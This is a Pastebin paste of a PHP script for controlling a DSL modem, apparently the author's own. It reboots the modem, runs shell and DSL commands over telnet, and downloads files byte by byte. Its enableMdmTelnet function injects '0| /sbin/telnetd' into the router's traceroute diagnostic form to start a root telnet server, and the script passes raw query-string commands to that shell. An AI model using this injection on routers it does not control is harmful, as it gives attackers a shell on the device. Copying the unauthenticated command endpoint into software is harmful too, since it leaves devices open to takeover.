API tools faq
paste
Guest User

Untitled

a guest
Jan 21st, 2019
91
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 12.74 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. $mdmip = '192.168.1.1';
  3.  
  4. foreach ($_GET as $k => $v) {
  5.     if ($k == 'reboot') {
  6.         header('Content-type: text/plain');
  7.         echo executeMdmShellCmd('reboot');
  8.     }
  9.     if ($k == 'shellcmd') {
  10.         header('Content-type: text/plain');
  11.         echo executeMdmShellCmd($v);
  12.     }
  13.     if ($k == 'dslcmd') {
  14.         header('Content-type: text/plain');
  15.         echo mdmDSLCPECmd($v);
  16.     }
  17.     if ($k == 'resync') {
  18.         header('Content-type: text/plain');
  19.         echo mdmDSLCPECmd('g997pmsft 3');
  20.         sleep(10);
  21.         echo mdmDSLCPECmd('g997pmsft 0');
  22.     }
  23.     if ($k == 'download') {
  24.         $f = split("/",$v);
  25.         $fn = $f[(count($f)-1)];
  26.         if (strpos($fn,'.') == '') {
  27.             $fn .= ".bin";
  28.         }
  29.         $data = getBinaryFileFromTelnet($v);
  30.         if (strlen($data) > 0) {
  31.             header('Content-Disposition: attachment; filename="'.$fn.'"');
  32.             header('Content-length: '.strlen($data));
  33.             echo $data;
  34.         }
  35.     }
  36. }
  37.  
  38. function getBinaryFileFromTelnet($f) {
  39.     $prelim = executeMdmShellCmd('cmp -l /dev/zero "'.$f.'" 2>/dev/null');
  40.     $prelim = split("\n",$prelim);
  41.     $odat = '';
  42.     $len = split(" ",$prelim[(count($prelim)-1)]);
  43.     $len = $len[0];
  44.     for ($i=0;$i<$len;$i++) {
  45.         $bindat[$i] = chr(0);
  46.     }
  47.     foreach ($prelim as $line) {
  48.         $l = split(" ",$line);
  49.         $oct = $l[(count($l)-1)];
  50.         $bindat[($l[0]-1)] = chr(octdec($oct));
  51.     }
  52.     unset($prelim);
  53.     foreach ($bindat as $byte) {
  54.         $odat .= $byte;
  55.     }
  56.     unset($bindat);
  57.     return $odat;
  58. }
  59.  
  60.  
  61. function mdmDSLCPECmd($c) {
  62.     executeMdmShellCmd('echo "'.$c.'" > /tmp/pipe/dsl_cpe0_cmd');
  63.     sleep(1);
  64.     return executeMdmShellCmd('cat /tmp/pipe/dsl_cpe0_ack');
  65. }
  66.  
  67.  
  68. function executeMdmShellCmd($cmd) {
  69.     global $mdmip;
  70.     $i = 0;
  71.     $telnet = new Telnet($mdmip);
  72.     tstart:
  73.     $i++;
  74.     // Define prompt as something unique that will not exist in any file
  75.     $myprompt = chr(174).'zshell'.chr(175).' ';
  76.  
  77.     $result = $telnet->connect();
  78.     if ($result != false) {
  79.         // Wait for default prompt
  80.         $telnet->setPrompt('#');
  81.         $telnet->waitPrompt();
  82.         // Prepare for new prompt
  83.         $telnet->setPrompt($myprompt);
  84.         // Set new prompt
  85.         echo $telnet->exec("PS1='".$myprompt."'");
  86.         $telnet->waitPrompt();
  87.         // Now we can execute a command
  88.         $res = $telnet->exec($cmd);
  89.         $telnet->disconnect();
  90.         $res = preg_replace("/\r/",'',$res);
  91.         // Remove the echoed back command
  92.         $resn = split("\n",$res);
  93.         unset($resn[0]);
  94.         $res = implode("\n",$resn);
  95.         return $res;
  96.     } else {
  97.         // If telnet server is not running, enable it via exploit.
  98.         // then try to execute our command again, up to 3 times.
  99.         if ($i < 3) {
  100.             enableMdmTelnet();
  101.             sleep(2);
  102.             goto tstart;
  103.         } else {
  104.             // Failure to start telnet server, or connect to it, or whatever
  105.         }
  106.     }
  107. }
  108.  
  109. function enableMdmTelnet() {
  110.     // Using an exploit, activate the telnet server
  111.     $cmd = "/sbin/telnetd";
  112.     $passwd = $_SERVER['PHP_AUTH_PW'];
  113.  
  114.     $c['next_page'] = "/htmlV/adv_diagnostics.asp";
  115.     $c['Self_Test'] = "";
  116.     $c['Ping_ISP_Router'] = "";
  117.     $c['diag_dns'] = "";
  118.     $c['diag_ping'] = "";
  119.     $c['diag_traceroute'] = "0| ".$cmd;
  120.     $c['diag_traceroute_maxhops'] = 1;
  121.     $cf = "";
  122.     foreach ($c as $k => $v) {
  123.         $cf .= $k."=".urlencode($v)."&";
  124.     }
  125.     $cf = rtrim($cf,"&");
  126.  
  127.     // Send the command
  128.     $u = "admin:".$passwd."@192.168.1.1/goform/EventForm";
  129.     $ch = curl_init();
  130.     $timeout = 10;
  131.     curl_setopt($ch, CURLOPT_URL, $u);
  132.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  133.     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  134.     curl_setopt($ch,CURLOPT_POST, 1);
  135.     curl_setopt($ch,CURLOPT_POSTFIELDS, $cf);
  136.     $data = curl_exec($ch);
  137.     curl_close($ch);
  138.  
  139.     // Give the modem a bit to process the command
  140.     sleep(2);
  141.  
  142.     // Request the form which is magically populated with the results
  143.     $u = "admin:".$passwd."@192.168.1.1".$c['next_page'];
  144.     $ch = curl_init();
  145.     $timeout = 5;
  146.     curl_setopt($ch, CURLOPT_URL, $u);
  147.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  148.     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  149.     $data = curl_exec($ch);
  150.     curl_close($ch);
  151. /*
  152.     // Filter out HTML
  153.     $res = getBetween($data,"--- Trace Route Test Results ---\n","</TEXTAREA>");
  154.     // Return raw shell command result
  155.     return $res;
  156. */
  157. }
  158.  
  159. function getBetween($src,$start,$end) {
  160. $c1 = (strpos($src,$start) + strlen($start));
  161. $c2 = strpos($src,$end,$c1);
  162. return substr($src,$c1,($c2 - $c1));
  163. }
  164.  
  165. /**
  166.  * Telnet class
  167.  *
  168.  * Used to execute remote commands via telnet connection
  169.  * Usess sockets functions and fgetc() to process result
  170.  *
  171.  * All methods throw Exceptions on error
  172.  *
  173.  * Written by Dalibor Andzakovic <dali@swerve.co.nz>
  174.  * Based on the code originally written by Marc Ennaji and extended by
  175.  * Matthias Blaser <mb@adfinis.ch>
  176.  */
  177. class Telnet {
  178.     private $host;
  179.     private $port;
  180.     private $timeout;
  181.     private $socket= NULL;
  182.     private $buffer = NULL;
  183.     private $prompt;
  184.     private $errno;
  185.     private $errstr;
  186.     private $NULL;
  187.     private $DC1;
  188.     private $WILL;
  189.     private $WONT;
  190.     private $DO;
  191.     private $DONT;
  192.     private $IAC;
  193.     const TELNET_ERROR = FALSE;
  194.     const TELNET_OK = TRUE;
  195.  
  196.     /**
  197.      * Constructor. Initialises host, port and timeout parameters
  198.      * defaults to localhost port 23 (standard telnet port)
  199.      *
  200.      * @param string $host Host name or IP addres
  201.      * @param int $port TCP port number
  202.      * @param int $timeout Connection timeout in seconds
  203.      * @return void
  204.     */
  205.     public function __construct($host, $port = '23', $timeout = 10){
  206.         $this->host = $host;
  207.         $this->port = $port;
  208.         $this->timeout = $timeout;
  209.  
  210.         // set some telnet special characters
  211.         $this->NULL = chr(0);
  212.         $this->DC1 = chr(17);
  213.         $this->WILL = chr(251);
  214.         $this->WONT = chr(252);
  215.         $this->DO = chr(253);
  216.         $this->DONT = chr(254);
  217.         $this->IAC = chr(255);
  218.         $this->connect();
  219.     }
  220.  
  221.     /**
  222.      * Destructor. Cleans up socket connection and command buffer
  223.      *
  224.      * @return void
  225.      */
  226.     public function __destruct() {
  227.         // cleanup resources
  228.         $this->disconnect();
  229.         $this->buffer = NULL;
  230.     }
  231.  
  232.     /**
  233.      * Attempts connection to remote host. Returns TRUE if sucessful.
  234.      *
  235.      * @return boolean
  236.      */
  237.     public function connect(){
  238.         // check if we need to convert host to IP
  239.         if (!preg_match('/([0-9]{1,3}\\.){3,3}[0-9]{1,3}/', $this->host)) {
  240.             $ip = gethostbyname($this->host);
  241.             if($this->host == $ip){
  242.                 throw new Exception("Cannot resolve $this->host");
  243.             } else{
  244.                 $this->host = $ip;
  245.             }
  246.         }
  247.         // attempt connection
  248.         $this->socket = @fsockopen($this->host, $this->port, $this->errno, $this->errstr, $this->timeout);
  249.         if (!$this->socket){
  250.             return false;
  251.         }
  252.         return self::TELNET_OK;
  253.     }
  254.  
  255.     /**
  256.      * Closes IP socket
  257.      *
  258.      * @return boolean
  259.      */
  260.     public function disconnect(){
  261.         if ($this->socket){
  262.             if (! fclose($this->socket)){
  263.                 throw new Exception("Error while closing telnet socket");
  264.             }
  265.             $this->socket = NULL;
  266.         }
  267.         return self::TELNET_OK;
  268.     }
  269.  
  270.     /**
  271.      * Executes command and returns a string with result.
  272.      * This method is a wrapper for lower level private methods
  273.      *
  274.      * @param string $command Command to execute
  275.      * @return string Command result
  276.      */
  277.     public function exec($command, $addNewLine=true) {
  278.         $this->write($command, $addNewLine);
  279.         $this->waitPrompt(1);
  280.         return $this->getBuffer();
  281.     }
  282.  
  283.     /**
  284.      * Attempts login to remote host.
  285.      * This method is a wrapper for lower level private methods and should be
  286.      * modified to reflect telnet implementation details like login/password
  287.      * and line prompts. Defaults to standard unix non-root prompts
  288.      *
  289.      * @param string $username Username
  290.      * @param string $password Password
  291.      * @return boolean
  292.      */
  293.     public function login($username, $password) {
  294.         try{
  295.             $this->setPrompt('ogin:');
  296.             $this->waitPrompt();
  297.             $this->write($username);
  298.             $this->setPrompt('assword:');
  299.             $this->waitPrompt();
  300.             $this->write($password);
  301.             //$this->setPrompt();
  302.             //$this->waitPrompt();
  303.         } catch(Exception $e){
  304.             throw new Exception("Login failed.");
  305.         }
  306.         return self::TELNET_OK;
  307.     }
  308.  
  309.     /**
  310.      * Sets the string of characters to respond to.
  311.      * This should be set to the last character of the command line prompt
  312.      *
  313.      * @param string $s String to respond to
  314.      * @return boolean
  315.      */
  316.     public function setPrompt($s = '$'){
  317.         $this->prompt = $s;
  318.         return self::TELNET_OK;
  319.     }
  320.  
  321.     /**
  322.      * Gets character from the socket
  323.      *
  324.      * @return void
  325.      */
  326.     private function getc() {
  327.         return fgetc($this->socket);
  328.     }
  329.  
  330.     /**
  331.      * Clears internal command buffer
  332.      *
  333.      * @return void
  334.      */
  335.     private function clearBuffer() {
  336.         $this->buffer = '';
  337.     }
  338.  
  339.     /**
  340.      * Reads characters from the socket and adds them to command buffer.
  341.      * Handles telnet control characters. Stops when prompt is ecountered.
  342.      *
  343.      * @param string $prompt
  344.      * @return boolean
  345.      */
  346.     private function readTo($prompt){
  347.         if (!$this->socket){
  348.             throw new Exception("Telnet connection closed");
  349.         }
  350.         // clear the buffer
  351.         $this->clearBuffer();
  352.         do{
  353.             $c = $this->getc();
  354.             if ($c === false){
  355.                 throw new Exception("Couldn't find the requested : '" . $prompt . "', it was not in the data returned from server : '" . $buf . "'");
  356.             }
  357.             if ($c == $this->IAC) {
  358.                 if ($this->negotiateTelnetOptions()){
  359.                     continue;
  360.                 }
  361.             }
  362.             // append current char to global buffer
  363.             $this->buffer .= $c;
  364.             // we've encountered the prompt. Break out of the loop
  365.             if ((substr($this->buffer, strlen($this->buffer) - strlen($prompt))) == $prompt){
  366.                 return self::TELNET_OK;
  367.             }
  368.         } while($c != $this->NULL || $c != $this->DC1);
  369.     }
  370.  
  371.     /**
  372.      * Write command to a socket
  373.      *
  374.      * @param string $buffer Stuff to write to socket
  375.      * @param boolean $addNewLine Default true, adds newline to the command
  376.      * @return boolean
  377.      */
  378.     public function write($buffer, $addNewLine=true){
  379.         if (!$this->socket){
  380.             throw new Exception("Telnet connection closed");
  381.         }
  382.         // clear buffer from last command
  383.         $this->clearBuffer();
  384.         if ($addNewLine == true){
  385.             $buffer .= "\n";
  386.         }
  387.         if (!fwrite($this->socket, $buffer) < 0){
  388.             throw new Exception("Error writing to socket");
  389.         }
  390.         return self::TELNET_OK;
  391.     }
  392.  
  393.     /**
  394.      * Returns the content of the command buffer
  395.      *
  396.      * @return string Content of the command buffer
  397.      */
  398.     private function getBuffer(){
  399.         // cut last line (is always prompt)
  400.         $buf = explode("\n", $this->buffer);
  401.         unset($buf[count($buf)-1]);
  402.         $buf = implode("\n",$buf);
  403.         return trim($buf);
  404.     }
  405.  
  406.     /**
  407.      * Telnet control character magic
  408.      *
  409.      * @param string $command Character to check
  410.      * @return boolean
  411.      */
  412.     private function negotiateTelnetOptions(){
  413.         $c = $this->getc();
  414.         if ($c != $this->IAC){
  415.             if (($c == $this->DO) || ($c == $this->DONT)){
  416.                 $opt = $this->getc();
  417.                 fwrite($this->socket, $this->IAC . $this->WONT . $opt);
  418.             } else if (($c == $this->WILL) || ($c == $this->WONT)) {
  419.                 $opt = $this->getc();
  420.                 fwrite($this->socket, $this->IAC . $this->DONT . $opt);
  421.             } else {
  422.                 throw new Exception('Error: unknown control character ' . ord($c ));
  423.             }
  424.         } else{
  425.             throw new Exception('Error: Something Wicked Happened');
  426.         }
  427.         return self::TELNET_OK;
  428.     }
  429.  
  430.     /**
  431.      * Reads socket until prompt is encountered
  432.      */
  433.     public function waitPrompt(){
  434.         $prompt = $this->prompt;
  435.         return $this->readTo($prompt);
  436.     }
  437. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!